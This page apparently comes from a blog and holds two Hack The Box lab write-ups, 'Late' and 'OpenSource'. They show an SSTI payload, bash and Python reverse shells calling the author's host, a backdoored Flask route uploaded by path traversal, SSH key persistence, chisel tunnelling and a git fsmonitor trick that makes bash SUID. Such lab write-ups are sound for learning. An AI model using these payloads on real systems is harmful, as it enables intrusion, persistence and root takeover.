Hack The Box Archives - Page 6 of 6

Hack The Box – Late

Posted on January 14, 2025January 14, 2025 by haxez

Hello world, welcome to haxez. It’s time for another Hack The Box machine write up and this time we’re looking at Late. This machine has an interesting foothold which I’m looking forward to doing. I haven’t read up too much about it but let us give it a go.

Late Enumeration

As you can see from the Nmap results below, we have port 22 for SSH and port 80 for HTTP open. SSH is unlikely to be the foothold as we have port 80 looking at us. From the banners, we can see that it’s using Nginx and that the title of the application is Best online image tools.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/Late]
└──╼ [★]$ sudo nmap -sC -sV -A -p- 10.129.227.134 -oA late
[sudo] password for haxez: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-16 07:54 GMT
Nmap scan report for 10.129.227.134
Host is up (0.013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 025e290ea3af4e729da4fe0dcb5d8307 (RSA)
|   256 41e1fe03a5c797c4d51677f3410ce9fb (ECDSA)
|_  256 28394698171e461a1ea1ab3b9a577048 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   11.84 ms 10.10.14.1
2   13.02 ms 10.129.227.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.80 seconds

The Application

As you can see from the screenshot below, the application was basic and didn’t have much to interact with. However, there was a link on the page to the “late free online photo editor”.

Clicking this link redirects you to ‘http://images.late.htb’ which doesn’t load because it isn’t in our host file. So, we need to add this to our host file so that the DNS resolves correctly. Then, we will be able to see the application.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/Late]
└──╼ [★]$ echo '10.129.227.134 images.late.htb' | sudo tee -a /etc/hosts
10.129.227.134 images.late.htb

The application now loads and appears to provide an image-converting tool. More specifically, it seems to be an OCR tool in that it converts images of text to text. OCR, or Optical Character Recognition, is a technology that enables the conversion of scanned images into digital text. OCR software works by analyzing the shapes and patterns of characters and converting them into machine-readable text. One additional note, the application proudly claims it is using Flask.

Late Foodhold

Since the application is using Flask, it is likely using templates to build the application. Wouldn’t it be extremely cool if we could submit an image of a Server Side Template Injection (SSTI). Then when the application converts the image to text, it executes the code and gives us remote code execution. Using notepad and a screenshot tool we can create images and upload them to test this proof of concept. The image below is the image I used.

I saved the file but Windows gave it a ‘.PNG’ extension and the application doesn’t like it. I used my terminal to move it to a new file with a ‘.png’ extension. As you can see below, the application processes it and produces a text file with the answer to the sum.

Time to try something a bit more complicated, let’s see if we can return the values of the ID command. First, we create and export the image containing the payload which I stole from HackTricks. Unfortunately, it seems that a lot of fonts make double underscores look like one line. This could cause problems with the character recognition software.

{
self._TemplateReference__context.namespace.__init__.__globals__.os.popen("id").read()
}}

Imagine If This Worked

I have been doing this for what seems like an eternity, ok not quite. However, this really is a tedious process. It doesn’t teach me anything, it is just trial and error and I don’t really like this type of challenge. I tried using the script in the official walkthrough but that didn’t work. I have gone through multiple payloads as you can see below.

The problem seems to be with it messing up a single character. For example, a lot of the time it would miss an underscore where the text made two look like one line. You can see from the one below that it is changing the tick to a single speech mark. This one is frustrating.

This results in me getting errors and more errors.

Time to head over to Youtube and see how the Wizard solved it.

Standing On The Shoulders Of Giants

I’d eventually had enough and snipped the payload from IppSec’s video. It looked exactly the same as mine. I even did it in Comic Sans but I still couldn’t get it to work. I will put them below and you can decide what the difference is. You can tell which one is from IppSec’s video because it still has the purple clip from Flame Shot.

I have to be honest, if the margin for error is so small that two almost identical images get processed differently then I have to say that this is a bit stupid. Rant over. It finally worked and I was able to get ID. However, since it would only process the one from the Youtube video, I have a feeling I’m going to struggle when it comes to getting a shell.

Better Late Than Never

Before I continue, please take a look at the screenshot below. That is how many times I had to modify the payload before I was able to get it to work. It may not seem like a lot but when you’re tinkering with each one and getting errors it becomes incredibly frustrating. This wasn’t fun, the concept was fun but the execution was terrible. It should have had a larger margin for error. Even when my code was right, it didn’t work.

I finally got a payload to work based on the same principle that the wizard used on his youtube video. I set up a python web server and created an index file. The index file contained a bash command which just sent a reverse shell back to my host. The picture payload when processed would use curl to get the file and execute it with bash. I think this is the exact image I used in the end, the font type was Bahnschrift Light. Whether or not you get your reverse shell is pure luck… and it really shouldn’t be.

When the image was processed by the server it sent a get request to my file on my webserver which you can see in the output below. It took a few attempts.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Late]
└──╼ [★]$ sudo python3 -m http.server 80
[sudo] password for haxez: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.14.126 - - [16/Mar/2023 19:35:44] "GET / HTTP/1.1" 200 -
10.10.14.126 - - [16/Mar/2023 19:35:44] code 404, message File not found
10.10.14.126 - - [16/Mar/2023 19:35:44] "GET /favicon.ico HTTP/1.1" 404 -
10.129.243.130 - - [16/Mar/2023 20:00:03] "GET / HTTP/1.1" 200 -
10.129.243.130 - - [16/Mar/2023 20:00:51] "GET / HTTP/1.1" 200 -
10.129.243.130 - - [16/Mar/2023 20:03:41] "GET / HTTP/1.1" 200 -
10.129.243.130 - - [16/Mar/2023 20:04:45] "GET / HTTP/1.1" 200 -

Then finally my shell came through and I was able to capture the user flag.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Late]
sudo nc -lvnp 9001
svc_acc@late:~/app$ export TERM=xterm
svc_acc@late:~/app$ stty rows 43 cols 190
svc_acc@late:~/app$ ls /home
svc_acc
svc_acc@late:~/app$ cat /home/svc_acc/user.txt
592▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓b3f

Late Privilege Escalation

As you can imagine, the first thing I did after getting my shell was to upgrade it. The next thing I did was throw an SSH key into the user’s authorized key file to make sure I could get back on the box. There was no way in hell I was going to go through the process of getting a foothold again. Absolutely ridiculous.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~]
└──╼ [★]$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/haxez/.ssh/id_rsa): /home/haxez/sshkey
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/haxez/sshkey
Your public key has been saved in /home/haxez/sshkey.pub
The key fingerprint is:
SHA256:AMh1NoU5ILMkOIyR8waY6+WmGLt90qrVzFDXqBwSsG4 haxez@parrot
The key's randomart image is:
+---[RSA 3072]----+
|O*=o+.++.        |
|X=o= +++         |
|.*o o +..        |
|o o= + .         |
|.E+ o   S        |
|o. B             |
|.o+.+            |
|o+. o            |
|ooo+             |
+----[SHA256]-----+

Popping the key into authorized keys.

svc_acc@late:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnMhWDbZa0tLhfR9G5pcq1Y6Rb/aQ+TjCHr4rTkhAVYnC58j/rVLBlA3dzo6UvP4ollJWirCqLuifikKIhAfzTAA659f3D68+FNwPzjvv1jkb11CVioPvShoGKAoBSwmAr1q0KqnLhzfbfI8mMBU4ZGEO7jG1/LkwaMd7KAtJmo/DyUv5N/ISAq14cpnATihzLuVUNiupZ7iitmIxecI4rQjvIz6rCuUVAi6H5suBCeVd/v4BXJW9ZLTX7wa2jYvi5hr/AVVMpKhFBzBKKxK39/mrXVH6ieHD2tzblczVbKGvJuQZRi0onJ8AZfMiCOpI0UdMPCRebEDCDu0cAb03bXVnFAAaPImZx2p54D/Q2bCqMhfTBrNvUpsSgTtNLhBKRymbA6kS9dXD0VUnD5Q4Z73QUeKUyzqHWIAzFOjCwZEU09tc7+/efpWkpBT6iKm6WjuJ4whXlygjaFJxHB/htz0v25eetVDd3xoB/wUww6rnoWajB58fZ8SVgSxTjrAk= haxez@parrot' >> authorized_keys

With access to the box via SSH it was time for enumeration. After performing some searches I discovered a file called ‘ssh-alert.sh’. The permissions of the file suggested we had full ownership of it but for some reason, I was unable to write to it. Well, it turns out that there are other permissions (that I need to read about) that meant I could only append to the file.

Anyway, it turns out that this script is executed whenever someone logs in or out of SSH. It’s also executed by root. So we append a reverse shell to the end of the script and then log out of SSH.

svc_acc@late:~$ ls -l /usr/local/sbin/ssh-alert.sh
-rwxr-xr-x 1 svc_acc svc_acc 433 Mar 16 20:21 /usr/local/sbin/ssh-alert.sh
svc_acc@late:~$ lsattr /usr/local/sbin/ssh-alert.sh
-----a--------e--- /usr/local/sbin/ssh-alert.sh
svc_acc@late:~$ echo "bash -i >& /dev/tcp/10.10.14.126/1337 0>&1" >> /usr/local/sbin/ssh-alert.sh
svc_acc@late:~$ tail /usr/local/sbin/ssh-alert.sh 
        Date:        `date`
        Server:      `uname -a`
"
if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
bash -i >& /dev/tcp/10.10.14.126/1337 0>&1
svc_acc@late:~$

We get a shell as root and are finally able to finish the box.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~]
└──╼ [★]$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.126] from (UNKNOWN) [10.129.243.130] 51220
bash: cannot set terminal process group (2864): Inappropriate ioctl for device
bash: no job control in this shell
root@late:/# cat /root/root.txt
cat /root/root.txt
998▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓7ea

Late Review

The concept was awesome, but the execution was terrible. Initially, I had a lot of fun creating image payloads and thought that this was an amazing box for doing something different. 40 images later and the novelty had worn out and I wanted to quit. I didn’t learn anything from it that’s the problem. It was an exercise in persistence. As Einstein once said:

Insanity is doing the same thing over and over and expecting different results.

Albert Einstein

Is this what hacking is supposed to be? brute-forcing something repeatedly until it works? Perhaps I don’t have the patience for this after all. I know it’s not, I’m being cynical. The privilege escalation was good but by the time I got to do it, I was so fed up that I didn’t care.

Hack The Box – OpenSource

Posted on January 14, 2025January 14, 2025 by haxez

Hello world and welcome to haxez, I’m back on my daily hacking spree and this time I’m looking at the easy Hack The Box machine OpenSource. These writeups are not meant to be walkthroughs, they are to document my journey. I may get frustrated, and angry along the way but hopefully, I will root the box and learn something new.

OpenSource Enumeration

To start enumerating the box, we use our tried and tested old faithful tool of Nmap. As you can see from the output below, we have ports 22, 80 and 3000 open. If I didn’t already know that this was a Linux box then the ports would be a giveaway. Please note, I’ve snipped out some of the output in order to keep it looking neat.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ sudo nmap -sC -sV -p- -A 10.129.227.140
[sudo] password for haxez: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 07:18 GMT
Nmap scan report for 10.129.227.140
Host is up (0.013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1e59057ca958c923900f7523823d055f (RSA)
|   256 48a853e7e008aa1d968652bb8856a0b7 (ECDSA)
|_  256 021f979e3c8e7a1c7caf9d5a254bb8c8 (ED25519)
80/tcp   open     http    Werkzeug/2.1.2 Python/3.10.3
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
|_http-title: upcloud - Upload files for Free!
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Wed, 15 Mar 2023 07:19:07 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5316
|     Connection: close
|     <html lang="en">
|     <head>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
3000/tcp filtered ppp
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT      ADDRESS
1   11.64 ms 10.10.14.1
2   11.86 ms 10.129.227.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.68 seconds

Whats UpCloud?

Do you like UpCloud? Whats UpCloud? doesn’t quite work. Anyway, the web application appears to be advertising some type of file upload/transfer service. The download button allows us to download what appears to be the source code of the application. The take me there button takes us to a live version of the application.

OpenSource Code Analysis

So rather than poke at the application, I’m going to look at the source code. The answers to getting a foothold are likely to be found in the source code. Also, the video I’m watching to assist me is looking at the source code too. We can see that it is using docker.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ tree -R
├── app
│   ├── app
│   │   ├── configuration.py
│   │   ├── __init__.py
│   │   ├── static
│   │   │   ├── css
│   │   │   │   └── style.css
│   │   │   ├── js
│   │   │   │   ├── ie10-viewport-bug-workaround.js
│   │   │   │   └── script.js
│   │   │   └── vendor
│   │   │       ├── bootstrap
│   │   │       │   ├── css
│   │   │       │   │   ├── bootstrap.css
│   │   │       │   │   ├── bootstrap.css.map
│   │   │       │   │   ├── bootstrap-grid.css
│   │   │       │   │   ├── bootstrap-grid.css.map
│   │   │       │   │   ├── bootstrap-grid.min.css
│   │   │       │   │   ├── bootstrap-grid.min.css.map
│   │   │       │   │   ├── bootstrap.min.css
│   │   │       │   │   ├── bootstrap.min.css.map
│   │   │       │   │   ├── bootstrap-reboot.css
│   │   │       │   │   ├── bootstrap-reboot.css.map
│   │   │       │   │   ├── bootstrap-reboot.min.css
│   │   │       │   │   └── bootstrap-reboot.min.css.map
│   │   │       │   └── js
│   │   │       │       ├── bootstrap.bundle.js
│   │   │       │       ├── bootstrap.bundle.js.map
│   │   │       │       ├── bootstrap.bundle.min.js
│   │   │       │       ├── bootstrap.bundle.min.js.map
│   │   │       │       ├── bootstrap.js
│   │   │       │       ├── bootstrap.js.map
│   │   │       │       ├── bootstrap.min.js
│   │   │       │       └── bootstrap.min.js.map
│   │   │       ├── font-awesome
│   │   │       │   └── all.min.css
│   │   │       ├── jquery
│   │   │       │   ├── jquery-3.4.1.js
│   │   │       │   ├── jquery-3.4.1.min.js
│   │   │       │   └── jquery-3.4.1.min.map
│   │   │       └── popper
│   │   │           ├── popper.js
│   │   │           ├── popper.js.flow
│   │   │           ├── popper.js.map
│   │   │           ├── popper.min.js
│   │   │           ├── popper.min.js.map
│   │   │           ├── popper-utils.js
│   │   │           ├── popper-utils.js.map
│   │   │           ├── popper-utils.min.js
│   │   │           └── popper-utils.min.js.map
│   │   ├── templates
│   │   │   ├── index.html
│   │   │   ├── success.html
│   │   │   └── upload.html
│   │   ├── utils.py
│   │   └── views.py
│   ├── INSTALL.md
│   ├── public
│   │   └── uploads
│   └── run.py
├── build-docker.sh
├── config
│   └── supervisord.conf
├── Dockerfile
└── source.zip

A quick look at the Dockerfile suggests the image is Python:3-Alpine. I’ve done a few containers escapes before. I wonder if this is where we’re heading with this. Since docker is running on the host, it makes sense for us to use it to perform the privilege escalation.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ head Dockerfile 
FROM python:3-alpine
# Install packages
RUN apk add --update --no-cache supervisor
# Upgrade pip
RUN python -m pip install --upgrade pip
# Install dependencies
RUN pip install Flask

Change History

I’m not overly familiar with using git outside of using it to clone repositories. It’s something I need to improve upon especially since you can do cool forensic stuff like we’re about to. Can you do git log on any repository you clone? can you also do git show and git checkout on any repository? That’s great but also terrifying. Think of all the hidden credentials or private keys that are hidden in previous iterations of someone’s code.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ git log
commit 2c67a52253c6fe1f206ad82ba747e43208e8cfd9 (HEAD -> public)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:55:55 2022 +0200
    clean up dockerfile for production use
commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:45:17 2022 +0200
    initial

Let’s take a look at the changes made to the most recent commit. From the output below we can see that a few changes were made including setting the environment to production. I’m not sure if this allowed the Wizard to deduce there was a dev branch, or whether there is always a dev branch. I’m going to assume the latter until I read about it later.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ git show 2c67a52253c6fe1f206ad82ba747e43208e8cfd9
commit 2c67a52253c6fe1f206ad82ba747e43208e8cfd9 (HEAD -> public)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:55:55 2022 +0200
    clean up dockerfile for production use
diff --git a/Dockerfile b/Dockerfile
index 76c7768..5b0553c 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -29,7 +29,6 @@ ENV PYTHONDONTWRITEBYTECODE=1
 # Set mode
 ENV MODE="PRODUCTION"
-# ENV FLASK_DEBUG=1
 # Run supervisord
 CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]

Let’s get the dev branch and view the change history there. We can see that there have been a number of commits. Perhaps going through these will tell us a story about how the application was built. Maybe, there could even be some hard-coded credentials or something.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ git checkout dev
Switched to branch 'dev'
┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ git log
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:47:24 2022 +0200
ease testing
commit be4da71987bbbc8fae7c961fb2de01ebd0be1997
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:54 2022 +0200
    added gitignore
commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:16 2022 +0200
    updated
commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:45:17 2022 +0200
    initial

Pathfinding

According to the Wizard, there is a vulnerability in the following line of code. If you place a forward slash in front of a directory, it will cancel out the initial directory. So, the code below should place us in public/uploads. However, as we control the name of the file we can change the directory. I will have to see it in action before I can understand what’s happening. Sounds interesting though.

file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)

Unfortunately, it does seem that there is some input sanitization going on. The screenshot below shows that the application is attempting to capture ‘../’ from the filename. Hopefully, this shouldn’t cause too much of a problem. Perhaps we could double it up to something like ‘….//’ so that it only strips out the first ‘../’. We will see.

OpenSource Exploit Development

Ok, this makes sense to me when watching the video. However, I would have had no idea that this is what you were supposed to do. We take the original views.py file and edit it to add a “command shell” I suppose. Like with PHP and Bash, I imagine this is the Python equivalent and something that I will get used to. We take the original views.py and we add the following section at the bottom.

import os

from app.utils import get_file_name
from flask import render_template, request, send_file
from app import app
@app.route('/')
def index():
    return render_template('index.html')
@app.route('/download')
def download():
    return send_file(os.path.join(os.getcwd(), "app", "static", "source.zip"))
@app.route('/upcloud', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        f = request.files['file']
        file_name = get_file_name(f.filename)
        file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
        f.save(file_path)
        return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
    return render_template('upload.html')
@app.route('/uploads/<path:path>')
def send_report(path):
    path = get_file_name(path)
    return send_file(os.path.join(os.getcwd(), "public", "uploads", path))
@app.route('/run/<cmd>')
def run_command(cmd):
    import subprocess
    return subprocess.check_output(cmd.split(" "))

Then we save the file and upload it via Burp. We can use the weakness in the file upload code (mentioned previously) to change directories and overwrite the existing file. So we save the file as views.py.

And then we use Burp to upload it and change the directory to that of the original file. The original directory was ‘/app/app/views.py which we can obtain from generating a file not found error on the application.

OpenSource Foothold Proof Of Concept

I thought this was an extremely cool method of getting command execution. However, I wouldn’t have known what to do myself so I have learned a lot. I definitely need to be more confident when reviewing code. It exploits the file upload weakness to upload a malicious file and gives us command execution.

As you can see from the image below, we have changed the name of the file to ‘/app/app/views.py’. Now, when the file gets uploaded, it should overwrite the original ‘/app/app/views.py’ with our malicious file. Once it is uploaded, we should have command execution.

With the file uploaded, we can pass commands to the URL in order to run them. For example, I can run the following ‘whoami’ command by visiting ‘http://<target IP>/run/whoami and shockingly we can see that the application is running as root. However, this is probably going to be ‘root’ inside the docker container. We likely have a long way to go still.

OpenSouce Foothold Exploit

We’re now going to add another function to the views.py application. This function is going to be a reverse shell that lets it submit our IP address as an argument. I grabbed a Python payload from PayloadAllTheThings and modified it so that it would work with the existing code. Obviously, I was just copying everything that the Wizard was doing.

@app.route('/revshell/<ip>')
def rev_shell(ip):
    import socket,os,pty
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("ip",1337))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    pty.spawn("/bin/sh")

We can then go back to Repeater in Burpsuite and add our code to the bottom of the request and resend it. If it comes back with a 200 we should be good, if it errors then remove the changes, send the request to update it and try again.

Then start a listener on the port you chose (in my case 1337, because of course).

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ sudo nc -lvnp 1337
[sudo] password for haxez: 
listening on [any] 1337 ...

Then you visit the application route that you created in your browser and pass it your IP address. Unfortunately, it seems I got a socket error for some reason so I will need to go back and look at the code. Once, I’ve fixed that I will try again.

And I spotted my mistake, In the ‘s.connect((ip,10001))’ section, I still had the ‘ip’ in quotation marks. That makes sense. Ok, we now have a shell. Not a very good shell admittidly.

System Enumeration

This is a cool trick, after connecting to the host we can check the IP address and see that it is on a completely different range than the target. For example, the target IP for OpenSource is 10.129.227.140 but the IP returned in the shell is 172.17.0.8. This is a huge sign that we’re inside a container. We can further confirm this by using netcat to connect to the container host on port 22 via the first IP address in that range (like a default gateway I suppose).

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
24: eth0@if25: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP 
    link/ether 02:42:ac:11:00:08 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.8/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
nc 172.17.0.1 22
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7

Chiseling Through

Ok, so we’re on the container. We also know from our nmap scan that there was a port 3000. We can use a program called chisel to port forward the hosts port 3000 through our container so that we can access it locally. First, download the chisel program and use a python webserver to get it onto the docker container. Then on your attack box, start a server.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ ./chisel server -p 8001 --reverse
2023/03/15 09:59:54 server: Reverse tunnelling enabled
2023/03/15 09:59:54 server: Fingerprint PIZtzkgEwf3R2bylwQt/I86a2MUk/1eeKGSkL+nHRAU=
2023/03/15 09:59:54 server: Listening on http://0.0.0.0:8001

Then on the target, create a client that connects to your host.

/tmp # ./chisel client 10.10.14.126:8001 R:3000:172.17.0.1:3000
2023/03/15 10:17:32 client: Connecting to ws://10.10.14.126:8001
2023/03/15 10:17:32 client: Connected (Latency 12.057386ms)
172.17.0.1 - - [15/Mar/2023 10:18:03] "GET / HTTP/1.1" 200 -

We now have a new website which we can access by visiting http://localhost:3000. It looks like a git-style version management portal. I’ve never heard of Gitea before but now I’m going to have to go and research it in my own time.

We can also see that the application has a login page. However, we don’t appear to have any credentials for it. Perhaps we can find them in the source code we downloaded earlier.

OpenSource Getting User

I need to speed this up as I’m supposed to be working but let’s break it down quickly. First, we need to change to a different thing by running git checkout.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource]
└──╼ [★]$ git checkout a76f8f75f7a4a12b706b0cf9c983796fa1985820

Now we can grab the credentials from the settings.json file found in the hidden .vscode directory. We can use these credentials to login to the application.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~/OpenSource/app/.vscode]
└──╼ [★]$ cat settings.json 
{
  "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
  "http.proxy": "http://dev01:Soulless_Developer#[email protected]:5187/",
  "http.proxyStrictSSL": false
}

Attempting to navigate to the backup repository gives us an error. We need to add the URL to our host file.

echo '127.0.0.1 opensource.htb' | sudo tee -a /etc/hosts

The developer backed up his home directory including his private key. We can steal this, pop it into a text document, give it 600 permissions and use it to SSH to the server. From here we should be able to grab the user flag to. This has been a long path to get to the user, I hope root is fairly straightforward.

┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~]
└──╼ [★]$ vim dev.key
┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~]
└──╼ [★]$ chmod 600 dev.key
┌─[eu-dedivip-1]─[10.10.14.126]─[haxez@parrot]─[~]
└──╼ [★]$ ssh -i dev.key [email protected]
The authenticity of host '10.129.227.140 (10.129.227.140)' can't be established.
ECDSA key fingerprint is SHA256:a6VljAI6pLD7/108ls+Bi5y88kWaYI6+V4lTU0KQsQU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.227.140' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-176-generic x86_64)
* Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Wed Mar 15 10:36:34 UTC 2023
  System load:  0.03              Processes:              217
  Usage of /:   75.6% of 3.48GB   Users logged in:        0
  Memory usage: 22%               IP address for eth0:    10.129.227.140
  Swap usage:   0%                IP address for docker0: 172.17.0.1

16 updates can be applied immediately.
9 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Last login: Mon May 16 13:13:33 2022 from 10.10.14.23
dev01@opensource:~$ cat /home/dev01/user.txt 
e67▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓659

OpenSource Privilege Escalation

I downloaded a copy of pspy64 to the directory of my Python3 webserver. Then I used wget on the OpenSource target gox to download the file. I gave it executable permissions and ran it to see what processes were running. The following process stands out ‘/bin/bash /usr/local/bin/git-sync’.

dev01@opensource:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
2023/03/15 10:49:01 CMD: UID=0     PID=8943   | /bin/bash /usr/local/bin/git-sync 
2023/03/15 10:49:01 CMD: UID=0     PID=8944   | /bin/bash /usr/local/bin/git-sync 
2023/03/15 10:49:01 CMD: UID=0     PID=8946   | /bin/bash /usr/local/bin/git-sync 
2023/03/15 10:49:01 CMD: UID=0     PID=8947   | /usr/lib/git-core/git-remote-http

Let’s take a look at this file. It seems that it is looking for changes in /home/dev01. If there are any changes then it performs a git commit.

dev01@opensource:/tmp$ ls -lash /usr/local/bin/git-sync
4.0K -rwxr-xr-x 1 root root 239 Mar 23  2022 /usr/local/bin/git-sync
dev01@opensource:/tmp$ cat /usr/local/bin/git-sync
#!/bin/bash
cd /home/dev01/
if ! git status --porcelain; then
    echo "No changes"
else
    day=$(date +'%Y-%m-%d')
    echo "Changes detected, pushing.."
    git add .
    git commit -m "Backup for ${day}"
    git push origin main
fi

According to the official walkthrough, we can abuse this by adding a command to the .git/config file to give the /bin/bash binary SUID permissions so that it will automatically elevate us to root when we run it. Let’s give it a go. The following line needs to be added to the .git/config file, then the fsmonitor command will get executed when git commit is run.

fsmonitor = "chmod 4755 /bin/bash"

And that is that after waiting a moment you can list the ‘/bin/bash’ file and see that it now has the SUID bit set. You need only run the bash command to elevate to root and capture the root flag.

bash-4.4$ ls -laSh /bin/bash
-rwsr-xr-x 1 root root 1.1M Apr 18  2022 /bin/bash
bash-4.4$ bash -p
bash-4.4# whoami
root
bash-4.4# cat /root/root.txt
9eb▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓8f7

OpenSource Review

